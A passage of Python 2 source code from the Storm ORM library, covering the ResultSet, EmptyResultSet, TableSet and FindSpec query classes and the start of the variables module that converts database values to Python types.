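    # Illustrative usage sketch (not part of the original Storm source): slicing
    # only composes OFFSET/LIMIT; no query is run until an item is requested.
    #
    #   result = store.find(Person)   # Person is a hypothetical mapped class
    #   page = result[20:30]          # new ResultSet with offset=20, limit=10
    #   first_on_page = page[0]       # executes a single-row query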
def __contains__(self, item):
"""Check if an item is contained within the result set."""
columns, values = self._find_spec.get_columns_and_values_for_item(item)
if self._select is Undef and self._group_by is Undef:
# No predefined select: adjust the where clause.
dummy, default_tables = self._find_spec.get_columns_and_tables()
where = [Eq(*pair) for pair in zip(columns, values)]
if self._where is not Undef:
where.append(self._where)
select = Select(1, And(*where), self._tables,
default_tables)
else:
# Rewrite the predefined query and use it as a subquery.
aliased_columns = [Alias(column, "_key%d" % index)
for (index, column) in enumerate(columns)]
subquery = replace_columns(self._get_select(), aliased_columns)
where = [Eq(*pair) for pair in zip(aliased_columns, values)]
select = Select(1, And(*where), Alias(subquery, "_tmp"))
result = self._store._connection.execute(select)
return result.get_one() is not None
def is_empty(self):
"""Return C{True} if this result set doesn't contain any results."""
subselect = self._get_select()
subselect.limit = 1
subselect.order_by = Undef
select = Select(1, tables=Alias(subselect, "_tmp"), limit=1)
result = self._store._connection.execute(select)
return (not result.get_one())
def any(self):
"""Return a single item from the result set.
@return: An arbitrary object or C{None} if one isn't available.
@seealso: one(), first(), and last().
"""
select = self._get_select()
select.limit = 1
select.order_by = Undef
result = self._store._connection.execute(select)
values = result.get_one()
if values:
return self._load_objects(result, values)
return None
def _any(self):
"""Return a single item from the result without changing sort order.
@return: An arbitrary object or C{None} if one isn't available.
"""
select = self._get_select()
select.limit = 1
result = self._store._connection.execute(select)
values = result.get_one()
if values:
return self._load_objects(result, values)
return None
def first(self):
"""Return the first item from an ordered result set.
@raises UnorderedError: Raised if the result set isn't ordered.
@return: The first object or C{None} if one isn't available.
@seealso: last(), one(), and any().
"""
if self._order_by is Undef:
raise UnorderedError("Can't use first() on unordered result set")
return self._any()
def last(self):
"""Return the last item from an ordered result set.
@raises FeatureError: Raised if the result set has a C{LIMIT} set.
@raises UnorderedError: Raised if the result set isn't ordered.
@return: The last object or C{None} if one isn't available.
@seealso: first(), one(), and any().
"""
if self._order_by is Undef:
raise UnorderedError("Can't use last() on unordered result set")
if self._limit is not Undef:
raise FeatureError("Can't use last() with a slice "
"of defined stop index")
select = self._get_select()
select.offset = Undef
select.limit = 1
select.order_by = []
for expr in self._order_by:
if isinstance(expr, Desc):
select.order_by.append(expr.expr)
elif isinstance(expr, Asc):
select.order_by.append(Desc(expr.expr))
else:
select.order_by.append(Desc(expr))
result = self._store._connection.execute(select)
values = result.get_one()
if values:
return self._load_objects(result, values)
return None
def one(self):
"""Return one item from a result set containing at most one item.
@raises NotOneError: Raised if the result set contains more than one
item.
@return: The object or C{None} if one isn't available.
@seealso: first(), one(), and any().
"""
select = self._get_select()
# limit could be 1 due to slicing, for instance.
if select.limit is not Undef and select.limit > 2:
select.limit = 2
result = self._store._connection.execute(select)
values = result.get_one()
if result.get_one():
raise NotOneError("one() used with more than one result available")
if values:
return self._load_objects(result, values)
return None
def order_by(self, *args):
"""Specify the ordering of the results.
The query will be modified appropriately with an ORDER BY clause.
Ascending and descending order can be specified by wrapping
the columns in L{Asc} and L{Desc}.
@param args: One or more L{storm.expr.Column} objects.
"""
if self._offset is not Undef or self._limit is not Undef:
raise FeatureError("Can't reorder a sliced result set")
self._order_by = args or Undef
return self
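    # Illustrative usage sketch (not part of the original Storm source), assuming
    # a hypothetical Person class:
    #
    #   store.find(Person).order_by(Desc(Person.age), Person.name)
    #
    # Asc/Desc wrappers control direction; calling order_by() with no arguments
    # resets the ordering to Undef, which makes first()/last() raise UnorderedError.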
def remove(self):
"""Remove all rows represented by this ResultSet from the database.
This is done efficiently with a DELETE statement, so objects
are not actually loaded into Python.
"""
if self._group_by is not Undef:
raise FeatureError("Removing isn't supported after a "
" GROUP BY clause ")
if self._offset is not Undef or self._limit is not Undef:
raise FeatureError("Can't remove a sliced result set")
if self._find_spec.default_cls_info is None:
raise FeatureError("Removing not yet supported for tuple or "
"expression finds")
if self._select is not Undef:
raise FeatureError("Removing isn't supported with "
"set expressions (unions, etc)")
result = self._store._connection.execute(
Delete(self._where, self._find_spec.default_cls_info.table))
return result.rowcount
def group_by(self, *expr):
"""Group this ResultSet by the given expressions.
@param expr: The expressions used in the GROUP BY statement.
@return: self (not a copy).
"""
if self._select is not Undef:
raise FeatureError("Grouping isn't supported with "
"set expressions (unions, etc)")
find_spec = FindSpec(expr)
columns, dummy = find_spec.get_columns_and_tables()
self._group_by = columns
return self
def having(self, *expr):
"""Filter result previously grouped by.
@param expr: Instances of L{Expr}.
@return: self (not a copy).
"""
if self._group_by is Undef:
raise FeatureError("having can only be called after group_by.")
self._having = And(*expr)
return self
def _aggregate(self, aggregate_func, expr, column=None):
if self._group_by is not Undef:
raise FeatureError("Single aggregates aren't supported after a "
" GROUP BY clause ")
columns, default_tables = self._find_spec.get_columns_and_tables()
if (self._select is Undef and not self._distinct and
self._offset is Undef and self._limit is Undef):
select = Select(aggregate_func(expr), self._where,
self._tables, default_tables)
else:
if expr is Undef:
aggregate = aggregate_func(expr)
else:
alias = Alias(expr, "_expr")
columns.append(alias)
aggregate = aggregate_func(alias)
subquery = replace_columns(self._get_select(), columns)
select = Select(aggregate, tables=Alias(subquery, "_tmp"))
result = self._store._connection.execute(select)
value = result.get_one()[0]
variable_factory = getattr(column, "variable_factory", None)
if variable_factory:
variable = variable_factory(allow_none=True)
result.set_variable(variable, value)
return variable.get()
return value
def count(self, expr=Undef, distinct=False):
"""Get the number of objects represented by this ResultSet."""
return int(self._aggregate(lambda expr: Count(expr, distinct), expr))
def max(self, expr):
"""Get the highest value from an expression."""
return self._aggregate(Max, expr, expr)
def min(self, expr):
"""Get the lowest value from an expression."""
return self._aggregate(Min, expr, expr)
def avg(self, expr):
"""Get the average value from an expression."""
value = self._aggregate(Avg, expr)
if value is None:
return value
return float(value)
def sum(self, expr):
"""Get the sum of all values in an expression."""
return self._aggregate(Sum, expr, expr)
def get_select_expr(self, *columns):
"""Get a L{Select} expression to retrieve only the specified columns.
@param columns: One or more L{storm.expr.Column} objects whose values
will be fetched.
@raises FeatureError: Raised if no columns are specified or if this
result is a set expression such as a union.
@return: A L{Select} expression configured to use the query parameters
specified for this result set, and also limited to only retrieving
data for the specified columns.
"""
if not columns:
raise FeatureError("select() takes at least one column "
"as argument")
if self._select is not Undef:
raise FeatureError(
"Can't generate subselect expression for set expressions")
select = self._get_select()
select.columns = columns
return select
def values(self, *columns):
"""Retrieve only the specified columns.
This does not load full objects from the database into Python.
@param columns: One or more L{storm.expr.Column} objects whose
values will be fetched.
@raises FeatureError: Raised if no columns are specified or if this
result is a set expression such as a union.
@return: An iterator of tuples of the values for each column
from each matching row in the database.
"""
if not columns:
raise FeatureError("values() takes at least one column "
"as argument")
if self._select is not Undef:
raise FeatureError("values() can't be used with set expressions")
select = self._get_select()
select.columns = columns
result = self._store._connection.execute(select)
if len(columns) == 1:
variable = columns[0].variable_factory()
for values in result:
result.set_variable(variable, values[0])
yield variable.get()
else:
variables = [column.variable_factory() for column in columns]
for values in result:
for variable, value in zip(variables, values):
result.set_variable(variable, value)
yield tuple(variable.get() for variable in variables)
def set(self, *args, **kwargs):
"""Update objects in the result set with the given arguments.
This method will update all objects in the current result set
to match expressions given as equalities or keyword arguments.
These objects may still be in the database (an UPDATE is issued)
or may be cached.
For instance, C{result.set(Class.attr1 == 1, attr2=2)} will set
C{attr1} to 1 and C{attr2} to 2, on all matching objects.
"""
if self._group_by is not Undef:
raise FeatureError("Setting isn't supported after a "
" GROUP BY clause ")
if self._find_spec.default_cls_info is None:
raise FeatureError("Setting isn't supported with tuple or "
"expression finds")
if self._select is not Undef:
raise FeatureError("Setting isn't supported with "
"set expressions (unions, etc)")
if not (args or kwargs):
return
changes = {}
cls = self._find_spec.default_cls_info.cls
# For now only "Class.attr == var" is supported in args.
for expr in args:
if not isinstance(expr, Eq):
raise FeatureError("Unsupported set expression: %r" %
repr(expr))
elif not isinstance(expr.expr1, Column):
raise FeatureError("Unsupported left operand in set "
"expression: %r" % repr(expr.expr1))
elif not isinstance(expr.expr2, (Expr, Variable)):
raise FeatureError("Unsupported right operand in set "
"expression: %r" % repr(expr.expr2))
changes[expr.expr1] = expr.expr2
for key, value in kwargs.items():
column = getattr(cls, key)
if value is None:
changes[column] = None
elif isinstance(value, Expr):
changes[column] = value
else:
changes[column] = column.variable_factory(value=value)
expr = Update(changes, self._where,
self._find_spec.default_cls_info.table)
self._store.execute(expr, noresult=True)
try:
cached = self.cached()
except CompileError:
# We are iterating through all objects in memory here, so
# check if the object type matches to avoid trying to
# invalidate a column that does not exist, on an unrelated
# object.
for obj_info in self._store._iter_alive():
if obj_info.cls_info is self._find_spec.default_cls_info:
for column in changes:
obj_info.variables[column].set(AutoReload)
else:
changes = changes.items()
for obj in cached:
for column, value in changes:
variables = get_obj_info(obj).variables
if value is None:
pass
elif isinstance(value, Variable):
value = value.get()
elif isinstance(value, Expr):
# If the value is an Expression that means we
# can't compute it by ourselves: we rely on
# the database to compute it, so just set the
# value to AutoReload.
value = AutoReload
else:
value = variables[value].get()
variables[column].set(value)
variables[column].checkpoint()
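    # Illustrative usage sketch (not part of the original Storm source), echoing
    # the docstring above with a hypothetical Person class:
    #
    #   store.find(Person, Person.name == u"Joe").set(Person.salary == 5000, bonus=0)
    #
    # Matching cached objects are updated (or marked AutoReload) in memory so
    # they stay consistent with the UPDATE issued against the database.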
def cached(self):
"""Return matching objects from the cache for the current query."""
if self._find_spec.default_cls_info is None:
raise FeatureError("Cache finds not supported with tuples "
"or expressions")
if self._tables is not Undef:
raise FeatureError("Cache finds not supported with custom tables")
if self._where is Undef:
match = None
else:
match = compile_python.get_matcher(self._where)
def get_column(column):
return obj_info.variables[column].get()
objects = []
for obj_info in self._store._iter_alive():
try:
if (obj_info.cls_info is self._find_spec.default_cls_info and
(match is None or match(get_column))):
objects.append(self._store._get_object(obj_info))
except LostObjectError:
pass # This may happen when resolving lazy values
# in get_column().
return objects
def find(self, *args, **kwargs):
"""Perform a query on objects within this result set.
This is analogous to L{Store.find}, although it doesn't take a
C{cls_spec} argument, instead using the same tables as the
existing result set, and restricts the results to those in
this set.
@param args: Instances of L{Expr}.
@param kwargs: Mapping of simple column names to values or
expressions to query for.
@return: A L{ResultSet} of matching instances.
"""
if self._select is not Undef:
raise FeatureError("Can't query set expressions")
if self._offset is not Undef or self._limit is not Undef:
raise FeatureError("Can't query a sliced result set")
if self._group_by is not Undef:
raise FeatureError("Can't query grouped result sets")
result_set = self.copy()
extra_where = get_where_for_args(
args, kwargs, self._find_spec.default_cls)
if extra_where is not Undef:
if result_set._where is Undef:
result_set._where = extra_where
else:
result_set._where = And(result_set._where, extra_where)
return result_set
def _set_expr(self, expr_cls, other, all=False):
if not self._find_spec.is_compatible(other._find_spec):
raise FeatureError("Incompatible results for set operation")
expr = expr_cls(self._get_select(), other._get_select(), all=all)
return ResultSet(self._store, self._find_spec, select=expr)
def union(self, other, all=False):
"""Get the L{Union} of this result set and another.
@param all: If True, include duplicates.
"""
if isinstance(other, EmptyResultSet):
return self
return self._set_expr(Union, other, all)
def difference(self, other, all=False):
"""Get the difference, using L{Except}, of this result set and another.
@param all: If True, include duplicates.
"""
if isinstance(other, EmptyResultSet):
return self
return self._set_expr(Except, other, all)
def intersection(self, other, all=False):
"""Get the L{Intersection} of this result set and another.
@param all: If True, include duplicates.
"""
if isinstance(other, EmptyResultSet):
return other
return self._set_expr(Intersect, other, all)
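    # Illustrative usage sketch (not part of the original Storm source): set
    # operations combine two compatible result sets into a new ResultSet.
    #
    #   adults = store.find(Person, Person.age >= 18)
    #   admins = store.find(Person, Person.is_admin == True)
    #   both = adults.intersection(admins)   # INTERSECT
    #   either = adults.union(admins)        # UNION; pass all=True to keep duplicates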
class EmptyResultSet(object):
"""An object that looks like a L{ResultSet} but represents no rows.
This is convenient for application developers who want to provide
a method which is guaranteed to return a L{ResultSet}-like object
but which, in certain cases, knows there is no point in querying
the database. For example::
def get_people(self, ids):
if not ids:
return EmptyResultSet()
return store.find(People, People.id.is_in(ids))
The methods on EmptyResultSet (L{one}, L{config}, L{union}, etc)
are meant to emulate a L{ResultSet} which has matched no rows.
"""
def __init__(self, ordered=False):
self._order_by = ordered
def copy(self):
result = EmptyResultSet(self._order_by)
return result
def config(self, distinct=None, offset=None, limit=None):
pass
def __iter__(self):
return
yield None
def __getitem__(self, index):
return self.copy()
def __contains__(self, item):
return False
def is_empty(self):
return True
def any(self):
return None
def first(self):
if self._order_by:
return None
raise UnorderedError("Can't use first() on unordered result set")
def last(self):
if self._order_by:
return None
raise UnorderedError("Can't use last() on unordered result set")
def one(self):
return None
def order_by(self, *args):
self._order_by = True
return self
def remove(self):
return 0
def count(self, expr=Undef, distinct=False):
return 0
def max(self, column):
return None
def min(self, column):
return None
def avg(self, column):
return None
def sum(self, column):
return None
def get_select_expr(self, *columns):
"""Get a L{Select} expression to retrieve only the specified columns.
@param columns: One or more L{storm.expr.Column} objects whose values
will be fetched.
@raises FeatureError: Raised if no columns are specified.
@return: A L{Select} expression configured to use the query parameters
specified for this result set. The result of the select will
always be an empty set of rows.
"""
if not columns:
raise FeatureError("select() takes at least one column "
"as argument")
return Select(columns, False)
def values(self, *columns):
if not columns:
raise FeatureError("values() takes at least one column "
"as argument")
return
yield None
def set(self, *args, **kwargs):
pass
def cached(self):
return []
def find(self, *args, **kwargs):
return self
def union(self, other):
if isinstance(other, EmptyResultSet):
return self
return other.union(self)
def difference(self, other):
return self
def intersection(self, other):
return self
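# Illustrative note (not part of the original module): the set operations above
# short-circuit when one operand is an EmptyResultSet.  A hedged sketch of the
# expected behaviour, assuming `people` is a ResultSet returned by store.find():
#
#     empty = EmptyResultSet()
#     people.union(empty) is people          # True -- ResultSet.union() returns self
#     people.intersection(empty) is empty    # True -- intersection() returns the empty set
#     empty.union(people) is people          # True -- EmptyResultSet defers to the other set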
class TableSet(object):
"""The representation of a set of tables which can be queried at once.
This will typically be constructed by a call to L{Store.using}.
"""
def __init__(self, store, tables):
self._store = store
self._tables = tables
def find(self, cls_spec, *args, **kwargs):
"""Perform a query on the previously specified tables.
This is identical to L{Store.find} except that the tables are
explicitly specified instead of relying on inference.
@return: A L{ResultSet}.
"""
if self._store._implicit_flush_block_count == 0:
self._store.flush()
find_spec = FindSpec(cls_spec)
where = get_where_for_args(args, kwargs, find_spec.default_cls)
return self._store._result_set_factory(self._store, find_spec,
where, self._tables)
Store._result_set_factory = ResultSet
Store._table_set = TableSet
class FindSpec(object):
"""The set of tables or expressions in the result of L{Store.find}."""
def __init__(self, cls_spec):
self.is_tuple = type(cls_spec) == tuple
if not self.is_tuple:
cls_spec = (cls_spec,)
info = []
for item in cls_spec:
if isinstance(item, Expr):
info.append((True, item))
else:
info.append((False, get_cls_info(item)))
self._cls_spec_info = tuple(info)
# Do we have a single non-expression item here?
if not self.is_tuple and not info[0][0]:
self.default_cls = cls_spec[0]
self.default_cls_info = info[0][1]
self.default_order = self.default_cls_info.default_order
else:
self.default_cls = None
self.default_cls_info = None
self.default_order = Undef
def get_columns_and_tables(self):
columns = []
default_tables = []
for is_expr, info in self._cls_spec_info:
if is_expr:
columns.append(info)
if isinstance(info, Column):
default_tables.append(info.table)
else:
columns.extend(info.columns)
default_tables.append(info.table)
return columns, default_tables
def is_compatible(self, find_spec):
"""Return True if this FindSpec is compatible with a second one."""
if self.is_tuple != find_spec.is_tuple:
return False
if len(self._cls_spec_info) != len(find_spec._cls_spec_info):
return False
for (is_expr1, info1), (is_expr2, info2) in zip(
self._cls_spec_info, find_spec._cls_spec_info):
if is_expr1 != is_expr2:
return False
if info1 is not info2:
return False
return True
def load_objects(self, store, result, values):
objects = []
values_start = values_end = 0
for is_expr, info in self._cls_spec_info:
if is_expr:
values_end += 1
variable = getattr(info, "variable_factory", Variable)(
value=values[values_start], from_db=True)
objects.append(variable.get())
else:
values_end += len(info.columns)
obj = store._load_object(info, result,
values[values_start:values_end])
objects.append(obj)
values_start = values_end
if self.is_tuple:
return tuple(objects)
else:
return objects[0]
def get_columns_and_values_for_item(self, item):
"""Generate a comparison expression with the given item."""
if isinstance(item, tuple):
if not self.is_tuple:
raise TypeError("Find spec does not expect tuples.")
else:
if self.is_tuple:
raise TypeError("Find spec expects tuples.")
item = (item,)
columns = []
values = []
for (is_expr, info), value in zip(self._cls_spec_info, item):
if is_expr:
if not isinstance(value, (Expr, Variable)) and (
value is not None):
value = getattr(info, "variable_factory", Variable)(
value=value)
columns.append(info)
values.append(value)
else:
obj_info = get_obj_info(value)
if obj_info.cls_info != info:
raise TypeError("%r does not match %r" % (value, info))
columns.extend(info.primary_key)
values.extend(obj_info.primary_vars)
return columns, values
def get_where_for_args(args, kwargs, cls=None):
equals = list(args)
if kwargs:
if cls is None:
raise FeatureError("Can't determine class that keyword "
"arguments are associated with")
for key, value in kwargs.items():
equals.append(getattr(cls, key) == value)
if equals:
return And(*equals)
return Undef
def replace_columns(expr, columns):
if isinstance(expr, Select):
select = copy(expr)
select.columns = columns
# Remove the ordering if it won't affect the result of the query.
if select.limit is Undef and select.offset is Undef:
select.order_by = Undef
return select
elif isinstance(expr, SetExpr):
# The ORDER BY clause might refer to columns we have replaced.
# Luckily we can ignore it if there is no limit/offset.
if expr.order_by is not Undef and (
expr.limit is not Undef or expr.offset is not Undef):
raise FeatureError(
"__contains__() does not yet support set "
"expressions that combine ORDER BY with "
"LIMIT/OFFSET")
subexprs = [replace_columns(subexpr, columns)
for subexpr in expr.exprs]
return expr.__class__(
all=expr.all, limit=expr.limit, offset=expr.offset,
*subexprs)
else:
raise FeatureError(
"__contains__() does not yet support %r expressions"
% (expr.__class__,))
class AutoReload(LazyValue):
"""A marker for reloading a single value.
Often this will be used to specify that a specific attribute
should be loaded from the database on the next access, like so::
storm_object.property = AutoReload
On the next access to C{storm_object.property}, the value will be
loaded from the database.
It is also often used as a default value for a property::
class Person(object):
__storm_table__ = "person"
id = Int(allow_none=False, default=AutoReload)
person = store.add(Person)
person.id # gets the attribute from the database.
"""
pass
AutoReload = AutoReload()
```
#### File: db/storm/variables.py
```python
from datetime import datetime, date, time, timedelta
from decimal import Decimal
import cPickle as pickle
import re
try:
import uuid
except ImportError:
uuid = None
from storm.compat import json
from storm.exceptions import NoneError
from storm import Undef, has_cextensions
__all__ = [
"VariableFactory",
"Variable",
"LazyValue",
"BoolVariable",
"IntVariable",
"FloatVariable",
"DecimalVariable",
"RawStrVariable",
"UnicodeVariable",
"DateTimeVariable",
"DateVariable",
"TimeVariable",
"TimeDeltaVariable",
"EnumVariable",
"UUIDVariable",
"PickleVariable",
"JSONVariable",
"ListVariable",
]
class LazyValue(object):
"""Marker to be used as a base class on lazily evaluated values."""
__slots__ = ()
def raise_none_error(column):
if not column:
raise NoneError("None isn't acceptable as a value")
else:
from storm.expr import compile, CompileError
name = column.name
if column.table is not Undef:
try:
table = compile(column.table)
name = "%s.%s" % (table, name)
except CompileError:
pass
raise NoneError("None isn't acceptable as a value for %s" % name)
def VariableFactory(cls, **old_kwargs):
"""Build cls with kwargs of constructor updated by kwargs of call.
This is really an implementation of partial/curry functions, and
is replaced by 'partial' when 2.5+ is in use.
"""
def variable_factory(**new_kwargs):
kwargs = old_kwargs.copy()
kwargs.update(new_kwargs)
return cls(**kwargs)
return variable_factory
try:
from functools import partial as VariableFactory
except ImportError:
pass
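# Illustrative sketch (not part of the original module): VariableFactory simply
# pre-binds constructor keyword arguments, so a factory created once can later be
# called with additional or overriding kwargs.  Assuming the IntVariable subclass
# defined further below:
#
#     factory = VariableFactory(IntVariable, allow_none=False)
#     var = factory(value=3)   # same as IntVariable(value=3, allow_none=False)
#     var.get()                # -> 3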
class Variable(object):
"""Basic representation of a database value in Python.
@type column: L{storm.expr.Column}
@ivar column: The column this variable represents.
@type event: L{storm.event.EventSystem}
@ivar event: The event system on which to broadcast events. If
None, no events will be emitted.
"""
_value = Undef
_lazy_value = Undef
_checkpoint_state = Undef
_allow_none = True
_validator = None
_validator_object_factory = None
_validator_attribute = None
column = None
event = None
def __init__(self, value=Undef, value_factory=Undef, from_db=False,
allow_none=True, column=None, event=None, validator=None,
validator_object_factory=None, validator_attribute=None):
"""
@param value: The initial value of this variable. The default
behavior is for the value to stay undefined until it is
set with L{set}.
@param value_factory: If specified, this will immediately be
called to get the initial value.
@param from_db: A boolean value indicating where the initial
value comes from, if C{value} or C{value_factory} are
specified.
@param allow_none: A boolean indicating whether None should be
allowed to be set as the value of this variable.
@param validator: Validation function called whenever trying to
set the variable to a non-db value. The function should
look like validator(object, attr, value), where the first and
second arguments are the result of validator_object_factory()
(or None, if this parameter isn't provided) and the value of
validator_attribute, respectively. When called, the function
should raise an error if the value is unacceptable, or return
the value to be used in place of the original value otherwise.
@type column: L{storm.expr.Column}
@param column: The column that this variable represents. It's
used for reporting better error messages.
@type event: L{EventSystem}
@param event: The event system to broadcast messages with. If
not specified, then no events will be broadcast.
"""
if not allow_none:
self._allow_none = False
if value is not Undef:
self.set(value, from_db)
elif value_factory is not Undef:
self.set(value_factory(), from_db)
if validator is not None:
self._validator = validator
self._validator_object_factory = validator_object_factory
self._validator_attribute = validator_attribute
self.column = column
self.event = event
def get_lazy(self, default=None):
"""Get the current L{LazyValue} without resolving its value.
@param default: If no L{LazyValue} was previously specified,
return this value. Defaults to None.
"""
if self._lazy_value is Undef:
return default
return self._lazy_value
def get(self, default=None, to_db=False):
"""Get the value, resolving it from a L{LazyValue} if necessary.
If the current value is an instance of L{LazyValue}, then the
C{resolve-lazy-value} event will be emitted, to give third
parties the chance to resolve the lazy value to a real value.
@param default: Returned if no value has been set.
@param to_db: A boolean flag indicating whether this value is
destined for the database.
"""
if self._lazy_value is not Undef and self.event is not None:
self.event.emit("resolve-lazy-value", self, self._lazy_value)
value = self._value
if value is Undef:
return default
if value is None:
return None
return self.parse_get(value, to_db)
def set(self, value, from_db=False):
"""Set a new value.
Generally this will be called when an attribute was set in
Python, or data is being loaded from the database.
If the value is different from the previous value (or it is a
L{LazyValue}), then the C{changed} event will be emitted.
@param value: The value to set. If this is an instance of
L{LazyValue}, then later calls to L{get} will try to
resolve the value.
@param from_db: A boolean indicating whether this value has
come from the database.
"""
# FASTPATH This method is part of the fast path. Be careful when
# changing it (try to profile any changes).
if isinstance(value, LazyValue):
self._lazy_value = value
self._checkpoint_state = new_value = Undef
else:
if not from_db and self._validator is not None:
# We use a factory rather than the object itself to prevent
# the cycle object => obj_info => variable => object
value = self._validator(self._validator_object_factory and
self._validator_object_factory(),
self._validator_attribute, value)
self._lazy_value = Undef
if value is None:
if self._allow_none is False:
raise_none_error(self.column)
new_value = None
else:
new_value = self.parse_set(value, from_db)
if from_db:
# Prepare it for being used by the hook below.
value = self.parse_get(new_value, False)
old_value = self._value
self._value = new_value
if (self.event is not None and
(self._lazy_value is not Undef or new_value != old_value)):
if old_value is not None and old_value is not Undef:
old_value = self.parse_get(old_value, False)
self.event.emit("changed", self, old_value, value, from_db)
def delete(self):
"""Delete the internal value.
If there was a value set, then emit the C{changed} event.
"""
old_value = self._value
if old_value is not Undef:
self._value = Undef
if self.event is not None:
if old_value is not None and old_value is not Undef:
old_value = self.parse_get(old_value, False)
self.event.emit("changed", self, old_value, Undef, False)
def is_defined(self):
"""Check whether there is currently a value.
@return: boolean indicating whether there is currently a value
for this variable. Note that if a L{LazyValue} was
previously set, this returns False; it only returns True if
there is currently a real value set.
"""
return self._value is not Undef
def has_changed(self):
"""Check whether the value has changed.
@return: boolean indicating whether the value has changed
since the last call to L{checkpoint}.
"""
return (self._lazy_value is not Undef or
self.get_state() != self._checkpoint_state)
def get_state(self):
"""Get the internal state of this object.
@return: A value which can later be passed to L{set_state}.
"""
return (self._lazy_value, self._value)
def set_state(self, state):
"""Set the internal state of this object.
@param state: A result from a previous call to
L{get_state}. The internal state of this variable will be set
to the state of the variable which get_state was called on.
"""
self._lazy_value, self._value = state
def checkpoint(self):
""""Checkpoint" the internal state.
See L{has_changed}.
"""
self._checkpoint_state = self.get_state()
def copy(self):
"""Make a new copy of this Variable with the same internal state."""
variable = self.__class__.__new__(self.__class__)
variable.set_state(self.get_state())
return variable
def parse_get(self, value, to_db):
"""Convert the internal value to an external value.
Get a representation of this value either for Python or for
the database. This method is only intended to be overridden
in subclasses, not called from external code.
@param value: The value to be converted.
@param to_db: Whether or not this value is destined for the
database.
"""
return value
def parse_set(self, value, from_db):
"""Convert an external value to an internal value.
A value is being set either from Python code or from the
database. Parse it into its internal representation. This
method is only intended to be overridden in subclasses, not
called from external code.
@param value: The value, either from Python code setting an
attribute or from a column in a database.
@param from_db: A boolean flag indicating whether this value
is from the database.
"""
return value
if has_cextensions:
from storm.cextensions import Variable
class BoolVariable(Variable):
__slots__ = ()
def parse_set(self, value, from_db):
if not isinstance(value, (int, long, float, Decimal)):
raise TypeError("Expected bool, found %r: %r"
% (type(value), value))
return bool(value)
class IntVariable(Variable):
__slots__ = ()
def parse_set(self, value, from_db):
if not isinstance(value, (int, long, float, Decimal)):
raise TypeError("Expected int, found %r: %r"
% (type(value), value))
return int(value)
class FloatVariable(Variable):
__slots__ = ()
def parse_set(self, value, from_db):
if not isinstance(value, (int, long, float, Decimal)):
raise TypeError("Expected float, found %r: %r"
% (type(value), value))
return float(value)
class DecimalVariable(Variable):
__slots__ = ()
@staticmethod
def parse_set(value, from_db):
if (from_db and isinstance(value, basestring) or
isinstance(value, (int, long))):
value = Decimal(value)
elif not isinstance(value, Decimal):
raise TypeError("Expected Decimal, found %r: %r"
% (type(value), value))
return value
@staticmethod
def parse_get(value, to_db):
if to_db:
return unicode(value)
return value
class RawStrVariable(Variable):
__slots__ = ()
def parse_set(self, value, from_db):
if isinstance(value, buffer):
value = str(value)
elif not isinstance(value, str):
raise TypeError("Expected str, found %r: %r"
% (type(value), value))
return value
class UnicodeVariable(Variable):
__slots__ = ()
def parse_set(self, value, from_db):
if not isinstance(value, unicode):
raise TypeError("Expected unicode, found %r: %r"
% (type(value), value))
return value
class DateTimeVariable(Variable):
__slots__ = ("_tzinfo",)
def __init__(self, *args, **kwargs):
self._tzinfo = kwargs.pop("tzinfo", None)
super(DateTimeVariable, self).__init__(*args, **kwargs)
def parse_set(self, value, from_db):
if from_db:
if isinstance(value, datetime):
pass
elif isinstance(value, (str, unicode)):
if " " not in value:
raise ValueError("Unknown date/time format: %r" % value)
date_str, time_str = value.split(" ")
value = datetime(*(_parse_date(date_str) +
_parse_time(time_str)))
else:
raise TypeError("Expected datetime, found %s" % repr(value))
if self._tzinfo is not None:
if value.tzinfo is None:
value = value.replace(tzinfo=self._tzinfo)
else:
value = value.astimezone(self._tzinfo)
else:
if type(value) in (int, long, float):
value = datetime.utcfromtimestamp(value)
elif not isinstance(value, datetime):
raise TypeError("Expected datetime, found %s" % repr(value))
if self._tzinfo is not None:
value = value.astimezone(self._tzinfo)
return value
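# Illustrative sketch (not part of the original module): DateTimeVariable accepts
# datetime objects or numeric timestamps from Python code, and "date time" strings
# from the database.  A hedged example of the conversions performed by parse_set():
#
#     var = DateTimeVariable()
#     var.set(0)                                    # -> datetime(1970, 1, 1, 0, 0)
#     var.set("2011-03-15 12:30:45", from_db=True)  # -> datetime(2011, 3, 15, 12, 30, 45)
#     var.get()                                     # returns the parsed datetime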
class DateVariable(Variable):
__slots__ = ()
def parse_set(self, value, from_db):
if from_db:
if value is None:
return None
if isinstance(value, datetime):
return value.date()
if isinstance(value, date):
return value
if not isinstance(value, (str, unicode)):
raise TypeError("Expected date, found %s" % repr(value))
if " " in value:
value, time_str = value.split(" ")
return date(*_parse_date(value))
else:
if isinstance(value, datetime):
return value.date()
if not isinstance(value, date):
raise TypeError("Expected date, found %s" % repr(value))
return value
class TimeVariable(Variable):
__slots__ = ()
def parse_set(self, value, from_db):
if from_db:
# XXX Can None ever get here, considering that set() checks for it?
if value is None:
return None
if isinstance(value, time):
return value
if not isinstance(value, (str, unicode)):
raise TypeError("Expected time, found %s" % repr(value))
if " " in value:
date_str, value = value.split(" ")
return time(*_parse_time(value))
else:
if isinstance(value, datetime):
return value.time()
if not isinstance(value, time):
raise TypeError("Expected time, found %s" % repr(value))
return value
class TimeDeltaVariable(Variable):
__slots__ = ()
def parse_set(self, value, from_db):
if from_db:
# XXX Can None ever get here, considering that set() checks for it?
if value is None:
return None
if isinstance(value, timedelta):
return value
if not isinstance(value, (str, unicode)):
raise TypeError("Expected timedelta, found %s" % repr(value))
return _parse_interval(value)
else:
if not isinstance(value, timedelta):
raise TypeError("Expected timedelta, found %s" % repr(value))
return value
class UUIDVariable(Variable):
__slots__ = ()
def parse_set(self, value, from_db):
assert uuid is not None, "The uuid module was not found."
if from_db and isinstance(value, basestring):
value = uuid.UUID(value)
elif not isinstance(value, uuid.UUID):
raise TypeError("Expected UUID, found %r: %r"
% (type(value), value))
return value
def parse_get(self, value, to_db):
if to_db:
return unicode(value)
return value
class EnumVariable(Variable):
__slots__ = ("_get_map", "_set_map")
def __init__(self, get_map, set_map, *args, **kwargs):
self._get_map = get_map
self._set_map = set_map
Variable.__init__(self, *args, **kwargs)
def parse_set(self, value, from_db):
if from_db:
return value
try:
return self._set_map[value]
except KeyError:
raise ValueError("Invalid enum value: %s" % repr(value))
def parse_get(self, value, to_db):
if to_db:
return value
try:
return self._get_map[value]
except KeyError:
raise ValueError("Invalid enum value: %s" % repr(value))
class MutableValueVariable(Variable):
"""
A variable which contains a reference to mutable content. For this kind
of variable, we can't simply detect when a modification has been made, so
we have to synchronize the content of the variable when the store is
flushing current objects, to check if the state has changed.
"""
__slots__ = ("_event_system")
def __init__(self, *args, **kwargs):
